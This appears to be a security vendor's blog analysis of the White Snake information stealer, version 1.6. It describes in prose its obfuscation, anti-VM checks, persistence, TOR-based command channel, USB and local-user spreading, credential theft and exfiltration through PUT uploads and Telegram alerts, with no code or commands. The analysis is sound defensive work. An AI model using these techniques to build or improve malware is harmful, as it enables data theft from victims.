The rise of malicious software designed to steal sensitive information has become a significant problem in the cybercrime landscape. They are specifically created to infiltrate computer systems and extract valuable data, including personal information, login credentials, financial details, and intellectual property. Known as information stealers or data stealers, these malware programs pose a prevalent threat.
Cybercriminals use various tactics to distribute information stealers, and once installed on a victim’s device, these malware programs operate discreetly, often evading detection by security software. Information stealers target a wide range of applications, including web browsers, email clients, instant messaging platforms, and financial software.
The stolen data is usually sold on underground marketplaces or used for illegal activities like identity theft, financial fraud, corporate espionage, or blackmail. The financial motivation behind information stealers, combined with their ability to collect sensitive data from numerous victims, makes them appealing to cybercriminals.
In February 2023, a new information stealer called White Snake emerged, joining the list of threats in this category. In this blog we have delved into the technical aspects of the updated White snake stealer version 1.6, to provide insights into its behaviour and shed light on its latest capabilities.
Focused on infiltrating diverse applications such as cryptocurrency wallets, FTP clients, and email clients among others, White Snake exhibits a range of capabilities. These include execution of commands on the victim’s system enabling activities like taking screenshots and capturing webcam. Having undergone continuous development since its initial arrival, it has prompted Telegram announcements that suggest the addition of new capabilities.
Samples showcasing these enhanced features on public repositories strongly suggests the active distribution of new versions of the White Snake stealer in the Cybercrime scene.
White Snake Stealer offers versions for both Windows and Linux systems. However, we have not been able to find any samples specifically targeting Linux systems while others aimed at Windows platforms were identified, demonstrating advanced features.
White Snake Stealer has undergone significant improvements, introducing the following key features:
These noteworthy enhancements in White Snake Stealer highlights its dynamic evolution and adaptability, posing a significant threat to user privacy and security.
The malware incorporates advanced string of obfuscation techniques which is used to deliberately obscure the code. This results in increased complexity and makes it challenging to decipher the underlying strings.
The figure above shows the method responsible for deobfuscating strings within the stealer’s codebase. Its widespread usage adds complexity to the analysis process. Additionally, the deliberate incorporation of redundant codes within the stealer adds further layers of complexity. These intentional obfuscation techniques make the analysis of the stealer even more intricate.
During the execution of the stealer’s main () method, the Anti VM method is invoked to prevent the malware from running in a virtual environment. This function employs Windows Management Instrumentation (WMI) queries to retrieve the system’s “Manufacturer” and “Model” information. Subsequently, it compares these details with predefined strings associated with VMs. If a match is detected, the malware terminates without proceeding with any further execution.
The stealer achieves persistence by duplicating itself in the Appdata directory and creating a scheduled task. Subsequently, it removes the original file to cover its tracks. Different versions are observed to be creating different directories.
Fig. Below shows the stealer creating a directory with the name “EsetSecurity.” Directory names may vary across different variants. It copies itself in this newly created directory.
The latest version of the stealer introduces a new beacon feature that leverages The Onion Routing Project (TOR) for its implementation. This enhanced functionality enhances the capabilities of the stealer and involves the following key components:
Through this communication channel facilitated by the HTTPListener(), the attacker can issue commands or exfiltrate stolen data from the victim’s machine. The attacker’s commands or requests are sent through the TOR network, reaching the hidden service configured on port 80, and subsequently forwarded to the local machine’s port 2392. The HTTPListener service of the stealer processes and responds to these requests.
Once a connection request is received from the TA, the stealer enters the processing phase. During this phase, it actively scans for incoming HTTP requests that utilize the POST method. The POST method is commonly used to send data to a web server, including commands or instructions in the payload of the request.
Upon detecting an incoming POST request, the stealer extracts and isolates the payload, which contains the commands encapsulated within the request. These commands may include instructions for various actions the stealer is designed to perform, such as collecting sensitive data, executing specific operations on the victim’s machine, or initiating further malicious activities.
By identifying and extracting the commands from the POST requests, the stealer gains access to the TA’s instructions and can proceed to execute them accordingly. This allows the TA to remotely control the stealer’s behaviour and carry out specific actions on the compromised system.
Subsequently, once the TA’s commands have been extracted from the incoming HTTP requests, the stealer proceeds with its processing. The processing phase involves interpreting and executing the commands as instructed by the TA.
The updated version of the stealer includes an expanded set of command capabilities, allowing it to perform the following actions:
The stealer has incorporated a USB spread capability, enabling it to propagate itself to removable disks. It achieves this by querying the system for removable disks and subsequently copying itself onto the identified media.
The updated stealer now includes a Local User Spread capability, allowing it to propagate among local users. The malware achieves this by iterating over user profiles and copying itself to the startup folder of each user. This ensures that the malware is automatically executed when users log in or the system restarts. By leveraging this persistence mechanism, the malware can effectively spread among local users, resulting in its widespread presence throughout the compromised system.
The malware exhibits the capability to extract sensitive information from various types of applications:
Furthermore, the malware possesses the capability to gather additional information from the victim’s system. This includes retrieving the username, computer name, public IP address, screen size, CPU, GPU, RAM, Disk, Model, OS information, running process and execution timestamp. These data points provide the attacker with valuable insights into the victim’s system and can be used for further analysis or exploitation.
Once the data is gathered, the malware employs the XmlSerializer to transform it into a serialized format. Subsequently, the serialized data undergoes compression and encryption using the RSA encryption algorithm. This multi-step process ensures the secure protection of the data, preserving its integrity and maintaining confidentiality. It is worth noting that the malware embeds the RSA key necessary for encryption within its own code.
Now, the stealer will proceed to affix tags, including the filename (e.g., Username@Computername_report.wsr), to the gathered information. Subsequently, the malware establishes a connection to a predetermined server controlled by the attacker using the WebClient class’s ‘uploadData’ method with the PUT HTTP method. The malware code includes hardcoded IP addresses that specify the destination server for transmitting the encrypted data. This allows the attacker to receive the stolen information from infected systems.
To notify attacker about the data exfiltration, the malware sends a notification through a Telegram chat by executing an HTTP GET request to the Telegram BOT API.
The contents of the URL are encoded with URL encoding. Decoding the Telegram message reveals valuable resources for the attacker: the stolen data’s URL and victim details. This allows the attacker to directly access and exploit the information for malicious purposes, increasing their effectiveness in carrying out harmful activities.
All Quick Heal customers are protected against this threat through the following signature:
To know more about Quick Heal’s range of digital protection visit –
The White Snake Stealer is an evolving threat that is being actively developed and distributed through the Malware-as-a-Service (MaaS) model. The threat actors responsible for this stealer is dedicated to improving the code and implementing techniques to bypass detection measures. This ongoing development highlights the persistent and evolving nature of the threat landscape, re-emphasizing the criticality for individuals and organizations to stay updated on the latest security practices, implement robust Défense mechanisms, and maintain strong cybersecurity hygiene to protect themselves against such threats.